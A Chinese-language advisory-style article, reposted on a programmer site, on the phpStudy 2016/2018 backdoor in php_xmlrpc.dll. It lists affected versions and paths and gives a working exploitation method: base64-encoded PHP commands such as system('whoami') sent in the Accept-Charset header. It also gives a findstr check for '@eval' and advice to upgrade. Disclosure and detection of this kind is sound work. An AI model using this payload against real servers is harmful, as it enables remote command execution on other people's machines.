欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

PHPstudy 后门漏洞

程序员文章站 2022-05-15 10:22:12
...

PHPstudy 后门

漏洞概述

phpStudy是国内一款免费PHP调试环境的程序集成包,能用来进行PHP 环境的调试和开发。
此漏洞可被利用执行命令。

涉及版本

phpStudy2016、phpStudy2018的部分版本

后门涉及部分

后门代码存在于\ext\php_xmlrpc.dll模块中,官网版本中默认xmplrpc模块的几个初始化函数都是被设置为NULL;被植入木马后的xmplrpc模块的函数被自定义,所有请求都会经过自定义函数。

至少有2个版本:

phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45

phpStudy20161103
php\php-5.2.17\ext\php_xmlrpc.dllphp\
php-5.4.45\ext\php_xmlrpc.dll

phpStudy20180211
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

利用方法

将要执行的命令base 64编码后写在请求包的Accept-charset中

  • 注意 gzip,deflate中间逗号无空格
举例:
Accept-Encoding: gzip,deflate
accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
排查方法

用户可以通过搜索php_xmlrpc.dll模块中包含“@eval”关键字快速判断是否是存在后门的版本
命令参考:

findstr /m /s /c:"@eval"  *.*

实例

  • url:http://host/
  • 请求包如下,将命令system(‘whoami’);进行base64编码后,放入参数中进行请求。
  1. whoami (查看当前身份)
    PHPstudy 后门漏洞

  2. cd (查看当前目录)

PHPstudy 后门漏洞

  • 注意:使用请求包中自带的Accept-Encoding值时,记得将gzip,deflate逗号后的空格清空:

PHPstudy 后门漏洞

建议

建议用户在官方 https://www.xp.cn/ 下载安装最新版本。

参考文章

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w